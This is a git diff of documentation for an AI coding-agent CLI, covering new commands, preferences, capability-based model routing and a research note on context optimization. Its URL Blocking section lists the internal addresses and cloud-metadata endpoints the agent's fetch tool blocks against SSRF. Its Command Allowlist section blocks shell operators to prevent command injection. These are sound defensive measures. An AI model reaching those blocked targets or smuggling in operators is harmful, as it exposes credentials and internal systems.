@@ -48,8 +60,10 @@
 | `/gsd new-milestone` | Create a new milestone |
 | `/gsd skip` | Prevent a unit from auto-mode dispatch |
 | `/gsd undo` | Revert last completed unit |
-| Park milestone | Available via `/gsd` wizard → "Milestone actions" → "Park" |
-| Unpark milestone | Available via `/gsd` wizard → "Milestone actions" → "Unpark" |
+| `/gsd undo-task` | Reset a specific task's completion state (DB + markdown) |
+| `/gsd reset-slice` | Reset a slice and all its tasks (DB + markdown) |
+| `/gsd park` | Park a milestone — skip without deleting |
+| `/gsd unpark` | Reactivate a parked milestone |
 | Discard milestone | Available via `/gsd` wizard → "Milestone actions" → "Discard" |
 
 ## Parallel Orchestration
@@ -65,6 +79,46 @@
 
 See [Parallel Orchestration](./parallel-orchestration.md) for full documentation.
 
+## Workflow Templates (v2.42)
+
+| Command | Description |
+|---------|-------------|
+| `/gsd start` | Start a workflow template (bugfix, spike, feature, hotfix, refactor, security-audit, dep-upgrade, full-project) |
+| `/gsd start resume` | Resume an in-progress workflow |
+| `/gsd templates` | List available workflow templates |
+| `/gsd templates info <name>` | Show detailed template info |
+
+## Custom Workflows (v2.42)
+
+| Command | Description |
+|---------|-------------|
+| `/gsd workflow new` | Create a new workflow definition (via skill) |
+| `/gsd workflow run <name>` | Create a run and start auto-mode |
+| `/gsd workflow list` | List workflow runs |
+| `/gsd workflow validate <name>` | Validate a workflow definition YAML |
+| `/gsd workflow pause` | Pause custom workflow auto-mode |
+| `/gsd workflow resume` | Resume paused custom workflow auto-mode |
+
+## Extensions
+
+| Command | Description |
+|---------|-------------|
+| `/gsd extensions list` | List all extensions and their status |
+| `/gsd extensions enable <id>` | Enable a disabled extension |
+| `/gsd extensions disable <id>` | Disable an extension |
+| `/gsd extensions info <id>` | Show extension details |
+
+## cmux Integration
+
+| Command | Description |
+|---------|-------------|
+| `/gsd cmux status` | Show cmux detection, prefs, and capabilities |
+| `/gsd cmux on` | Enable cmux integration |
+| `/gsd cmux off` | Disable cmux integration |
+| `/gsd cmux notifications on/off` | Toggle cmux desktop notifications |
+| `/gsd cmux sidebar on/off` | Toggle cmux sidebar metadata |
+| `/gsd cmux splits on/off` | Toggle cmux visual subagent splits |
+
 ## GitHub Sync (v2.39)
 
 | Command | Description |
@@ -116,6 +170,14 @@ Enable with `github.enabled: true` in preferences. Requires `gh` CLI installed a
 | `gsd --print "msg"` (`-p`) | Single-shot prompt mode (no TUI) |
 | `gsd --mode <text\|json\|rpc\|mcp>` | Output mode for non-interactive use |
 | `gsd --list-models [search]` | List available models and exit |
+| `gsd --web [path]` | Start browser-based web interface (optional project path) |
+| `gsd --worktree` (`-w`) [name] | Start session in a git worktree (auto-generates name if omitted) |
+| `gsd --no-session` | Disable session persistence |
+| `gsd --extension <path>` | Load an additional extension (can be repeated) |
+| `gsd --append-system-prompt <text>` | Append text to the system prompt |
+| `gsd --tools <list>` | Comma-separated list of tools to enable |
+| `gsd --version` (`-v`) | Print version and exit |
+| `gsd --help` (`-h`) | Print help and exit |
 | `gsd sessions` | Interactive session picker — list all saved sessions for the current directory and choose one to resume |
 | `gsd --debug` | Enable structured JSONL diagnostic logging for troubleshooting dispatch and state issues |
 | `gsd config` | Set up global API keys for search and docs tools (saved to `~/.gsd/agent/auth.json`, applies to all projects). See [Global API Keys](./configuration.md#global-api-keys-gsd-config). |
diff --git a/docs/configuration.md b/docs/configuration.md
index 4e99196d6..00512fa22 100644
--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -1,14 +1,14 @@
 # Configuration
 
-GSD preferences live in `~/.gsd/preferences.md` (global) or `.gsd/preferences.md` (project-local). Manage interactively with `/gsd prefs`.
+GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project-local). Manage interactively with `/gsd prefs`.
 
 ## `/gsd prefs` Commands
 
 | Command | Description |
 |---------|-------------|
 | `/gsd prefs` | Open the global preferences wizard (default) |
-| `/gsd prefs global` | Interactive wizard for global preferences (`~/.gsd/preferences.md`) |
-| `/gsd prefs project` | Interactive wizard for project preferences (`.gsd/preferences.md`) |
+| `/gsd prefs global` | Interactive wizard for global preferences (`~/.gsd/PREFERENCES.md`) |
+| `/gsd prefs project` | Interactive wizard for project preferences (`.gsd/PREFERENCES.md`) |
 | `/gsd prefs status` | Show current preference files, merged values, and skill resolution status |
 | `/gsd prefs wizard` | Alias for `/gsd prefs global` |
 | `/gsd prefs setup` | Alias for `/gsd prefs wizard` — creates preferences file if missing |
@@ -42,8 +42,8 @@ token_profile: balanced
 
 | Scope | Path | Applies to |
 |-------|------|-----------|
-| Global | `~/.gsd/preferences.md` | All projects |
-| Project | `.gsd/preferences.md` | Current project only |
+| Global | `~/.gsd/PREFERENCES.md` | All projects |
+| Project | `.gsd/PREFERENCES.md` | Current project only |
 
 **Merge behavior:**
 - **Scalar fields** (`skill_discovery`, `budget_ceiling`): project wins if defined
@@ -159,6 +159,8 @@ Recommended verification order:
 | `GSD_PROJECT_ID` | (auto-hash) | Override the automatic project identity hash. Per-project state goes to `$GSD_HOME/projects/<GSD_PROJECT_ID>/` instead of the computed hash. Useful for CI/CD or sharing state across clones of the same repo. (v2.39) |
 | `GSD_STATE_DIR` | `$GSD_HOME` | Per-project state root. Controls where `projects/<repo-hash>/` directories are created. Takes precedence over `GSD_HOME` for project state. |
 | `GSD_CODING_AGENT_DIR` | `$GSD_HOME/agent` | Agent directory containing managed resources, extensions, and auth. Takes precedence over `GSD_HOME` for agent paths. |
+| `GSD_ALLOWED_COMMAND_PREFIXES` | (built-in list) | Comma-separated command prefixes allowed for `!command` value resolution. Overrides `allowedCommandPrefixes` in settings.json. See [Custom Models — Command Allowlist](custom-models.md#command-allowlist). |
+| `GSD_FETCH_ALLOWED_URLS` | (none) | Comma-separated hostnames exempted from `fetch_page` URL blocking. Overrides `fetchAllowedUrls` in settings.json. See [URL Blocking](#url-blocking-fetch_page). |
 
 ## All Settings
 
@@ -346,6 +348,43 @@ verification_max_retries: 2       # max retry attempts (default: 2)
 | `verification_auto_fix` | boolean | `true` | Auto-retry when verification fails |
 | `verification_max_retries` | number | `2` | Maximum auto-fix retry attempts |
 
+### URL Blocking (`fetch_page`)
+
+The `fetch_page` tool blocks requests to private and internal network addresses to prevent server-side request forgery (SSRF). This protects against the agent being tricked into accessing internal services, cloud metadata endpoints, or local files.
+
+**Blocked by default:**
+
+| Category | Examples |
+|----------|----------|
+| Private IP ranges | `10.x.x.x`, `172.16-31.x.x`, `192.168.x.x`, `127.x.x.x` |
+| Link-local / cloud metadata | `169.254.x.x` (AWS/GCP instance metadata) |
+| Cloud metadata hostnames | `metadata.google.internal`, `instance-data` |
+| Localhost | `localhost` (any port) |
+| Non-HTTP protocols | `file://`, `ftp://` |
+| IPv6 private ranges | `::1`, `fc00:`, `fd`, `fe80:` |
+
+Public URLs (`https://example.com`, `http://8.8.8.8`) are not affected.
+
+**Allowing specific internal hosts:**
+
+If you need the agent to fetch from internal URLs (self-hosted docs, internal APIs behind a VPN), add their hostnames to `fetchAllowedUrls` in global settings (`~/.gsd/agent/settings.json`):
+
+```json
+{
+  "fetchAllowedUrls": ["internal-docs.company.com", "192.168.1.50"]
+}
+```
+
+Alternatively, set the `GSD_FETCH_ALLOWED_URLS` environment variable (comma-separated). The env var takes precedence over settings.json:
+
+```bash
+export GSD_FETCH_ALLOWED_URLS="internal-docs.company.com,192.168.1.50"
+```
+
+Allowed hostnames bypass the blocklist checks. The protocol restriction (HTTP/HTTPS only) still applies — `file://` and `ftp://` cannot be allowlisted.
+
+> **Note:** This setting is global-only. Project-level settings.json cannot override the URL allowlist — this prevents a cloned repo from directing `fetch_page` at internal infrastructure.
+
 ### `auto_report` (v2.26)
 
 Auto-generate HTML reports after milestone completion:
@@ -374,8 +413,8 @@ git:
   auto_push: false            # push commits to remote after committing
   push_branches: false        # push milestone branch to remote
   remote: origin              # git remote name
-  snapshots: false            # WIP snapshot commits during long tasks
-  pre_merge_check: false      # run checks before worktree merge (true/false/"auto")
+  snapshots: true             # WIP snapshot commits during long tasks
+  pre_merge_check: auto       # run checks before worktree merge (true/false/"auto")
   commit_type: feat           # override conventional commit prefix
   main_branch: main           # primary branch name
   merge_strategy: squash      # how worktree branches merge: "squash" or "merge"
@@ -392,8 +431,8 @@ git:
 | `auto_push` | boolean | `false` | Push commits to remote after committing |
 | `push_branches` | boolean | `false` | Push milestone branch to remote |
 | `remote` | string | `"origin"` | Git remote name |
-| `snapshots` | boolean | `false` | WIP snapshot commits during long tasks |
-| `pre_merge_check` | bool/string | `false` | Run checks before merge (`true`/`false`/`"auto"`) |
+| `snapshots` | boolean | `true` | WIP snapshot commits during long tasks |
+| `pre_merge_check` | bool/string | `"auto"` | Run checks before merge (`true`/`false`/`"auto"`) |
 | `commit_type` | string | (inferred) | Override conventional commit prefix (`feat`, `fix`, `refactor`, `docs`, `test`, `chore`, `perf`, `ci`, `build`, `style`) |
 | `main_branch` | string | `"main"` | Primary branch name |
 | `merge_strategy` | string | `"squash"` | How worktree branches merge: `"squash"` (combine all commits) or `"merge"` (preserve individual commits) |
@@ -494,6 +533,14 @@ notifications:
   on_attention: true          # notify when manual attention needed
 ```
 
+**macOS delivery:** GSD uses [`terminal-notifier`](https://github.com/julienXX/terminal-notifier) when available, falling back to `osascript`. We recommend installing `terminal-notifier` for reliable notification delivery:
+
+```bash
+brew install terminal-notifier
+```
+
+Why: `osascript display notification` is attributed to your terminal app (Ghostty, iTerm2, etc.), which may not have notification permissions in System Settings → Notifications. `terminal-notifier` registers as its own app and prompts for permission on first use. See [Troubleshooting: Notifications not appearing on macOS](troubleshooting.md#notifications-not-appearing-on-macos) if notifications aren't working.
+
 ### `remote_questions`
 
 Route interactive questions to Slack or Discord for headless auto mode:
@@ -578,7 +625,7 @@ prefer_skills:
 avoid_skills: []
 ```
 
-Skills can be bare names (looked up in `~/.gsd/agent/skills/`) or absolute paths.
+Skills can be bare names (looked up in `~/.agents/skills/` and `.agents/skills/`) or absolute paths.
 
 ### `skill_rules`
 
@@ -639,6 +686,7 @@ Complexity-based model routing. See [Dynamic Model Routing](./dynamic-model-rout
 ```yaml
 dynamic_routing:
   enabled: true
+  capability_routing: true          # score models by task capability (v2.59)
   tier_models:
     light: claude-haiku-4-5
     standard: claude-sonnet-4-6
@@ -648,6 +696,48 @@ dynamic_routing:
   cross_provider: true
 ```
 
+### `context_management` (v2.59)
+
+Controls observation masking and tool result truncation during auto-mode sessions. Reduces context bloat between compactions with zero LLM overhead.
+
+```yaml
+context_management:
+  observation_masking: true          # replace old tool results with placeholders (default: true)
+  observation_mask_turns: 8          # keep results from last N user turns (1-50, default: 8)
+  compaction_threshold_percent: 0.70 # target compaction at 70% context usage (0.5-0.95, default: 0.70)
+  tool_result_max_chars: 800         # cap individual tool result content (200-10000, default: 800)
+```
+
+### `service_tier` (v2.42)
+
+OpenAI service tier preference for supported models. Toggle with `/gsd fast`.
+
+| Value | Behavior |
+|-------|----------|
+| `"priority"` | Priority tier — 2x cost, faster responses |
+| `"flex"` | Flex tier — 0.5x cost, slower responses |
+| (unset) | Default tier |
+
+```yaml
+service_tier: priority
+```
+
+### `forensics_dedup` (v2.43)
+
+Opt-in: search existing issues and PRs before filing from `/gsd forensics`. Uses additional AI tokens.
+
+```yaml
+forensics_dedup: true    # default: false
+```
+
+### `show_token_cost` (v2.44)
+
+Opt-in: show per-prompt and cumulative session token cost in the footer.
+
+```yaml
+show_token_cost: true    # default: false
+```
+
 ### `auto_visualize`
 
 Show the workflow visualizer automatically after milestone completion:
@@ -734,6 +824,13 @@ notifications:
 # Visualizer
 auto_visualize: true
 
+# Service tier
+service_tier: priority         # "priority" or "flex" (for /gsd fast)
+
+# Diagnostics
+forensics_dedup: true          # deduplicate before filing forensics issues
+show_token_cost: true          # show per-prompt cost in footer
+
 # Hooks
 post_unit_hooks:
   - name: code-review
diff --git a/docs/context-and-hooks/07-the-system-prompt-anatomy.md b/docs/context-and-hooks/07-the-system-prompt-anatomy.md
index aa0fc79ea..7bb2c57cc 100644
--- a/docs/context-and-hooks/07-the-system-prompt-anatomy.md
+++ b/docs/context-and-hooks/07-the-system-prompt-anatomy.md
@@ -174,7 +174,7 @@ When a skill file references a relative path, resolve it against the skill direc
   <skill>
     <name>commit-outstanding</name>
     <description>Commit all uncommitted files in logical groups</description>
-    <location>/Users/you/.gsd/agent/skills/commit-outstanding/SKILL.md</location>
+    <location>/Users/you/.agents/skills/commit-outstanding/SKILL.md</location>
   </skill>
 </available_skills>
 ```
diff --git a/docs/custom-models.md b/docs/custom-models.md
index 943d213bf..76e949676 100644
--- a/docs/custom-models.md
+++ b/docs/custom-models.md
@@ -131,6 +131,36 @@ The `apiKey` and `headers` fields support three formats:
   "apiKey": "sk-..."
   ```
 
+#### Command Allowlist
+
+Shell commands (`!command`) are restricted to a set of known credential tools. Only commands starting with one of these are allowed to execute:
+
+`pass`, `op`, `aws`, `gcloud`, `vault`, `security`, `gpg`, `bw`, `gopass`, `lpass`
+
+Commands not on this list are blocked and the value resolves to `undefined`. A warning is written to stderr.
+
+Shell operators (`;`, `|`, `&`, `` ` ``, `$`, `>`, `<`) are also blocked in command arguments to prevent injection.
+
+**Customizing the allowlist:**
+
+If you use a credential tool not on the default list, override it in global settings (`~/.gsd/agent/settings.json`):
+
+```json
+{
+  "allowedCommandPrefixes": ["pass", "op", "sops", "doppler", "mycli"]
+}
+```
+
+This replaces the default list entirely — include any defaults you still want.
+
+Alternatively, set the `GSD_ALLOWED_COMMAND_PREFIXES` environment variable (comma-separated). The env var takes precedence over settings.json:
+
+```bash
+export GSD_ALLOWED_COMMAND_PREFIXES="pass,op,sops,doppler"
+```
+
+> **Note:** This setting is global-only. Project-level settings.json (`<project>/.gsd/settings.json`) cannot override the command allowlist — this prevents a cloned repo from escalating command execution privileges.
+
 ### Custom Headers
 
 ```json
diff --git a/docs/dynamic-model-routing.md b/docs/dynamic-model-routing.md
index 9d0d5525e..bc88df2bd 100644
--- a/docs/dynamic-model-routing.md
+++ b/docs/dynamic-model-routing.md
@@ -1,12 +1,20 @@
 # Dynamic Model Routing
 
-*Introduced in v2.19.0*
+*Introduced in v2.19.0. Capability scoring introduced in v2.52.0.*
 
 Dynamic model routing automatically selects cheaper models for simple work and reserves expensive models for complex tasks. This reduces token consumption by 20-50% on capped plans without sacrificing quality where it matters.
 
+Starting in v2.52.0, the router uses **capability-aware scoring** to select the *best fit* model for each task, not just the cheapest one in the tier.
+
 ## How It Works
 
-Each unit dispatched by auto-mode is classified into a complexity tier:
+Each unit dispatched by auto-mode passes through a two-stage pipeline:
+
+**Stage 1: Complexity classification** — classifies the work into a tier (light/standard/heavy).
+
+**Stage 2: Capability scoring** — within the eligible tier, ranks available models by how well their capabilities match the task's requirements.
+
+The key rule: **downgrade-only semantics**. The user's configured model is always the ceiling — routing never upgrades beyond what you've configured.
 
 | Tier | Typical Work | Default Model Level |
 |------|-------------|-------------------|
@@ -14,8 +22,6 @@ Each unit dispatched by auto-mode is classified into a complexity tier:
 | **Standard** | Research, planning, execution, milestone completion | Sonnet-class |
 | **Heavy** | Replanning, roadmap reassessment, complex execution | Opus-class |
 
-The router then selects a model for that tier. The key rule: **downgrade-only semantics**. The user's configured model is always the ceiling — routing never upgrades beyond what you've configured.
-
 ## Enabling
 
 Dynamic routing is off by default. Enable it in preferences:
@@ -41,6 +47,7 @@ dynamic_routing:
   budget_pressure: true           # auto-downgrade when approaching budget ceiling (default: true)
   cross_provider: true            # consider models from other providers (default: true)
   hooks: true                     # apply routing to post-unit hooks (default: true)
+  capability_routing: true        # enable capability scoring within tier (default: true)
 ```
 
 ### `tier_models`
@@ -70,6 +77,157 @@ When approaching the budget ceiling, the router progressively downgrades:
 
 When enabled, the router may select models from providers other than your primary. This uses the built-in cost table to find the cheapest model at each tier. Requires the target provider to be configured.
 
+### `capability_routing`
+
+When enabled (default: true), the router uses capability scoring to pick the best model in a tier rather than always defaulting to the cheapest. Set to `false` to revert to cheapest-in-tier behavior:
+
+```yaml
+dynamic_routing:
+  enabled: true
+  capability_routing: false   # disable scoring, use cheapest-in-tier
+```
+
+## Capability Profiles
+
+Each model has a built-in **capability profile** — a 7-dimension score (0–100) representing how well it handles different task types:
+
+| Dimension | What It Represents |
+|-----------|-------------------|
+| `coding` | Code generation and implementation accuracy |
+| `debugging` | Diagnosing and fixing errors |
+| `research` | Synthesizing information and exploring topics |
+| `reasoning` | Multi-step logical reasoning |
+| `speed` | Latency and throughput (inverse of capability depth) |
+| `longContext` | Handling large codebases and long documents |
+| `instruction` | Following structured instructions precisely |
+
+**Built-in profiles** exist for 9 models: `claude-opus-4-6`, `claude-sonnet-4-6`, `claude-haiku-4-5`, `gpt-4o`, `gpt-4o-mini`, `gemini-2.5-pro`, `gemini-2.0-flash`, `deepseek-chat`, `o3`.
+
+Models without a built-in profile receive **uniform scores of 50** across all dimensions. This is a cold-start policy — unknown models compete but don't have an advantage. From the user's perspective, routing behaves the same as before capability scoring was introduced for those models.
+
+**Profiles are heuristic rankings, not benchmarks.** They represent approximate relative strengths, not verified benchmark results. Use user overrides (below) to correct them for models you know well.
+
+## How Scoring Works
+
+The routing pipeline within a tier:
+
+```
+classify complexity tier
+    ↓
+filter eligible models for tier
+    ↓
+fire before_model_select hook (optional override)
+    ↓
+capability score eligible models
+    ↓
+select winner (or first eligible if scoring is disabled)
+```
+
+**Scoring formula:** weighted average of capability dimensions
+
+```
+score = Σ(weight × capability) / Σ(weights)
+```
+
+**Task requirements** are dynamic — different task types weight dimensions differently:
+
+| Unit Type | Key Dimensions |
+|-----------|---------------|
+| `execute-task` | coding (0.9), instruction (0.7), speed (0.3) |
+| `research-*` | research (0.9), longContext (0.7), reasoning (0.5) |
+| `plan-*` | reasoning (0.9), coding (0.5) |
+| `replan-slice` | reasoning (0.9), debugging (0.6), coding (0.5) |
+| `complete-slice`, `run-uat` | instruction (0.8), speed (0.7) |
+
+For `execute-task`, requirements are further refined by task metadata signals:
+- Tags like `docs`, `config`, `readme` → boost instruction weight
+- Keywords like `concurrency`, `compatibility` → boost debugging and reasoning
+- Keywords like `migration`, `architecture` → boost reasoning and coding
+- Large file counts (≥6) or large estimated line counts (≥500) → boost coding and reasoning
+
+**Tie-breaking:** When two models score within 2 points of each other, the cheaper model wins. If costs are equal, lexicographic model ID breaks the tie (deterministic).
+
+## User Overrides
+
+Correct built-in capability profiles for models you know well using `modelOverrides` in your models configuration:
+
+```json
+{
+  "providers": {
+    "anthropic": {
+      "modelOverrides": {
+        "claude-sonnet-4-6": {
+          "capabilities": {
+            "debugging": 90,
+            "research": 85
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+Overrides are **deep-merged** with built-in defaults — only the specified dimensions are overridden; others retain their built-in values.
+
+**Use case:** You've found that a model consistently outperforms its built-in profile on specific task types. Override the relevant dimensions to steer the router toward that model for those tasks.
+
+## Verbose Output
+
+When verbose mode is active, the router logs its routing decision. When capability scoring was used, the log includes a full scoring breakdown:
+
+```
+Dynamic routing [S]: claude-sonnet-4-6 (capability-scored) — claude-sonnet-4-6: 82.3, gpt-4o: 78.1, deepseek-chat: 72.0
+```
+
+When tier-only routing was used (scoring disabled, single eligible model, or routing guards applied):
+
+```
+Dynamic routing [S]: claude-sonnet-4-6 (standard complexity, multiple steps)
+```
+
+The `selectionMethod` field in the routing decision indicates which path was taken:
+- `"capability-scored"` — capability scoring selected the winner
+- `"tier-only"` — cheapest in tier (or explicit pin) was used
+
+## Extension Hook
+
+Extensions can intercept and override model selection using the `before_model_select` hook.
+
+The hook fires **after** tier filtering (eligible models are known) and **before** capability scoring (scores have not been computed yet). A hook can override selection entirely or return `undefined` to let scoring proceed normally.
+
+**Registering a handler:**
+
+```typescript
+pi.on("before_model_select", async (event) => {
+  const { unitType, unitId, classification, taskMetadata, eligibleModels, phaseConfig } = event;
+
+  // Custom routing strategy: always use gemini for research tasks
+  if (unitType.startsWith("research-")) {
+    const gemini = eligibleModels.find(id => id.includes("gemini"));
+    if (gemini) return { modelId: gemini };
+  }
+
+  // Return undefined to let capability scoring proceed
+  return undefined;
+});
+```
+
+**Event payload:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `unitType` | `string` | The unit type being dispatched (e.g., `"execute-task"`) |
+| `unitId` | `string` | Unique identifier for this unit dispatch |
+| `classification` | `{ tier, reason, downgraded }` | The complexity classification result |
+| `taskMetadata` | `Record<string, unknown> \| undefined` | Task metadata extracted from the unit plan |
+| `eligibleModels` | `string[]` | Models eligible for the classified tier |
+| `phaseConfig` | `{ primary, fallbacks } \| undefined` | The user's configured model for this phase |
+
+**Return value:** `{ modelId: string }` to override selection, or `undefined` to defer to capability scoring.
+
+**First-override-wins:** If multiple extensions register handlers, the first one to return a non-undefined result wins. Subsequent handlers are not called.
+
 ## Complexity Classification
 
 Units are classified using pure heuristics — no LLM calls, sub-millisecond:
diff --git a/docs/getting-started.md b/docs/getting-started.md
index bd79f868e..6fbcf2422 100644
--- a/docs/getting-started.md
+++ b/docs/getting-started.md
@@ -39,6 +39,10 @@ GSD is also available as a VS Code extension. Install from the marketplace (publ
 
 The CLI (`gsd-pi`) must be installed first — the extension connects to it via RPC.
 
+### Web Interface
+
+GSD also has a browser-based interface. Run `gsd --web` to start a local web server with a visual dashboard, real-time progress, and multi-project support. See [Web Interface](./web-interface.md) for details.
+
 ## First Launch
 
 Run `gsd` in any directory:
@@ -54,6 +58,8 @@ GSD displays a welcome screen showing your version, active model, and available
 
 If you have an existing Pi installation, provider credentials are imported automatically.
 
+For detailed setup instructions for specific providers (OpenRouter, Ollama, LM Studio, vLLM, and more), see the [Provider Setup Guide](./providers.md).
+
 Re-run the wizard anytime with:
 
 ```bash
diff --git a/docs/git-strategy.md b/docs/git-strategy.md
index 40576256f..c8274b7d0 100644
--- a/docs/git-strategy.md
+++ b/docs/git-strategy.md
@@ -36,10 +36,10 @@ Use this for hot-reload workflows where file isolation breaks dev tooling (e.g.,
 main ─────────────────────────────────────────────────────────
   │                                                     ↑
   └── milestone/M001 (worktree) ────────────────────────┘
-       commit: feat(S01/T01): core types
-       commit: feat(S01/T02): markdown parser
-       commit: feat(S01/T03): file writer
-       commit: docs(M001/S01): workflow docs
+       commit: feat: core types
+       commit: feat: markdown parser
+       commit: feat: file writer
+       commit: docs: workflow docs
        ...
        → squash-merged to main as single commit
 ```
@@ -56,13 +56,13 @@ With [parallel orchestration](./parallel-orchestration.md) enabled, multiple mil
 main ──────────────────────────────────────────────────────────
   │                                      ↑              ↑
   ├── milestone/M002 (worktree) ─────────┘              │
-  │    commit: feat(S01/T01): auth types                │
-  │    commit: feat(S01/T02): JWT middleware             │
+  │    commit: feat: auth types                         │
+  │    commit: feat: JWT middleware                     │
   │    → squash-merged first                            │
   │                                                     │
   └── milestone/M003 (worktree) ────────────────────────┘
-       commit: feat(S01/T01): dashboard layout
-       commit: feat(S01/T02): chart components
+       commit: feat: dashboard layout
+       commit: feat: chart components
        → squash-merged second
 ```
 
@@ -75,13 +75,16 @@ Each worktree operates on its own branch with its own commit history. Merges hap
 
 ### Commit Format
 
-Commits use conventional commit format with scope:
+Commits use conventional commit format with GSD metadata in trailers:
 
 ```
-feat(S01/T01): core type definitions
-feat(S01/T02): markdown parser for plan files
-fix(M001/S03): bug fixes and doc corrections
-docs(M001/S04): workflow documentation
+feat: core type definitions
+
+GSD-Task: M001/S01/T01
+
+feat: markdown parser for plan files
+
+GSD-Task: M001/S01/T02
 ```
 
 ## Worktree Management
diff --git a/docs/parallel-orchestration.md b/docs/parallel-orchestration.md
index 6b611291d..40463fa95 100644
--- a/docs/parallel-orchestration.md
+++ b/docs/parallel-orchestration.md
@@ -126,7 +126,7 @@ File overlaps are warnings, not blockers. Both milestones work in separate workt
 
 ## Configuration
 
-Add to `~/.gsd/preferences.md` or `.gsd/preferences.md`:
+Add to `~/.gsd/PREFERENCES.md` or `.gsd/PREFERENCES.md`:
 
 ```yaml
 ---
diff --git a/docs/pi-context-optimization-opportunities.md b/docs/pi-context-optimization-opportunities.md
new file mode 100644
index 000000000..9e34cc44c
--- /dev/null
+++ b/docs/pi-context-optimization-opportunities.md
@@ -0,0 +1,198 @@
+# pi-coding-agent: Context Optimization Opportunities
+
+> **Status**: Research only — not planned for implementation.
+> Scope: `packages/pi-coding-agent` and `packages/pi-agent-core` infrastructure.
+> These changes would benefit every consumer of the pi engine, not just GSD.
+
+---
+
+## 1. Prompt Caching (`cache_control`) — Highest Impact
+
+**Current state**: Every LLM call re-pays full input token cost for the system prompt, tool definitions, and context files. No `cache_control` breakpoints are set anywhere in the API call path.
+
+**Opportunity**: Anthropic's KV cache delivers 90% cost reduction on cached tokens (0.1x input rate). Claude Code achieves 92–98% cache hit rates by placing stable content before volatile content.
+
+**Where to instrument** (`packages/pi-ai/src/providers/anthropic.ts`):
+- Set `cache_control: { type: "ephemeral" }` on the last tool definition block
+- Set `cache_control` after the static system prompt sections (base boilerplate + context files)
+- Leave the per-turn user message uncached
+
+**Critical constraint**: The cache breakpoint must be placed *after* all static content and *before* any dynamic content (timestamps, per-request variables). Moving a timestamp before a cache breakpoint defeats it on every call.
+
+**Cache hierarchy**: Tools → system → messages. Changing a tool definition invalidates system and message caches. Tool definitions should be sorted deterministically (alphabetically) to prevent spurious cache misses.
+
+**Expected savings**: 80–90% reduction in input token cost for multi-turn sessions (the dominant cost pattern in GSD auto-mode).
+
+---
+
+## 2. Observation Masking in the Message Pipeline
+
+**Current state**: `agent-loop.ts` passes the full `context.messages` array to the LLM on every turn. Tool results from 50 turns ago are re-read in full on every subsequent call. The `transformContext` hook exists on `AgentContext` and fires before every LLM call, but has no default implementation — extensions are responsible for any pruning.
+
+**Opportunity**: Replace old tool result content with lightweight placeholders after N turns. JetBrains Research tested this on SWE-bench Verified (500 tasks, up to 250-turn trajectories) and found:
+- 50%+ cost reduction vs. unmanaged history
+- Performance matched or slightly exceeded LLM summarization
+- Zero overhead (no extra LLM call required)
+
+**Proposed implementation** (default `transformContext` in `pi-agent-core`):
+```typescript
+// Keep last KEEP_RECENT_TURNS verbatim; mask older tool results
+const KEEP_RECENT_TURNS = 8;
+
+function defaultObservationMask(messages: AgentMessage[]): AgentMessage[] {
+  const cutoff = findTurnBoundary(messages, KEEP_RECENT_TURNS);
+  return messages.map((m, i) => {
+    if (i >= cutoff) return m;
+    if (m.type === "toolResult" || m.type === "bashExecution") {
+      return { ...m, content: "[result masked — within summarized history]", excludeFromContext: false };
+    }
+    return m;
+  });
+}
+```
+
+**Compaction interaction**: Observation masking reduces the token accumulation rate, pushing the compaction threshold further out. The two mechanisms are complementary — masking handles the steady state, compaction handles the rare deep-session case.
+
+---
+
+## 3. Earlier Compaction Threshold
+
+**Current state** (`packages/pi-coding-agent/src/core/constants.ts`):
+```typescript
+COMPACTION_RESERVE_TOKENS = 16_384   // triggers at contextWindow - 16K
+COMPACTION_KEEP_RECENT_TOKENS = 20_000
+```
+
+For a 200K context window, compaction fires at ~183K tokens — 91.5% utilization.
+
+**Problem**: Context drift (not raw exhaustion) causes ~65% of enterprise agent failures. Performance degrades measurably beyond ~30K tokens per Zylos production data. The current threshold lets sessions run degraded for a long stretch before compaction fires.
+
+**Opportunity**: Lower the trigger to 70% utilization. For a 200K window, this means compacting at ~140K tokens — 43K tokens earlier.
+
+```typescript
+// Proposed
+COMPACTION_THRESHOLD_PERCENT = 0.70   // fire at 70% of contextWindow
+COMPACTION_RESERVE_TOKENS = contextWindow * (1 - COMPACTION_THRESHOLD_PERCENT)
+```
+
+**Trade-off**: More frequent compactions, each happening earlier when there's more "fresh" content to keep. Summary quality improves because less material needs to be discarded at each cut.
+
+---
+
+## 4. Tool Result Truncation at Write Time
+
+**Current state**: `TOOL_RESULT_MAX_CHARS = 2_000` in `constants.ts`, but this limit is only applied *during compaction summarization*, not when the tool result enters the message store. A bash result returning 50KB of log output is stored and re-sent verbatim until compaction fires.
+
+**Opportunity**: Truncate at write time in `messages.ts` → `convertToLlm()` or in the tool result handler. Two strategies:
+
+- **Hard truncation**: Slice at N chars, append `"\n[truncated — {original_length} chars]"`. Simple, zero overhead.
+- **Semantic head/tail**: Keep first 500 chars (context, command echo) + last 1000 chars (final output, errors). Better for bash results where the end contains the error.
+
+**Recommendation**: Semantic head/tail as the default, configurable per tool type. File read results benefit from head; bash/test output benefits from head+tail.
+
+---
+
+## 5. Context File Deduplication and Trim
+
+**Current state** (`packages/pi-coding-agent/src/core/resource-loader.ts`, lines 84–109):
+- Searches from `~/.gsd/agent/` → ancestor dirs → cwd
+- Deduplicates by *file path* but not by *content*
+- Entire file content concatenated verbatim into system prompt — no trimming, no summarization
+
+**Anti-pattern**: A project with AGENTS.md at 3 ancestor levels (repo root, workspace, home) injects all three in full. If they share common boilerplate, that content is re-injected multiple times.
+
+**Opportunities**:
+1. **Content deduplication**: Hash paragraph-level chunks; skip any chunk already seen in a previously-loaded file
+2. **Section-aware loading**: Parse `## ` headings in AGENTS.md; only include sections relevant to the current task type (e.g., `## Testing` section only when running tests)
+3. **Token budget enforcement**: If total context files exceed N tokens, summarize oldest/most-distant file rather than including verbatim
+
+---
+
+## 6. Skill Content Lazy Loading and Summarization
+
+**Current state**: When `/skill:name` is invoked, the full skill file content is injected inline as `<skill>...</skill>` in the user message. No chunking, no summarization. A 10KB skill file adds ~2,500 tokens to that turn.
+
+**Opportunity**:
+- **Cached skill injection**: If the same skill is used across multiple turns (rare but possible), it's re-injected each time. Cache with `cache_control` after first injection.
+- **Skill digest mode**: Inject a 200-token summary of the skill on first reference; full content only if the model requests it via a `get_skill_detail` tool call. Reduces cost for skills that don't end up being followed.
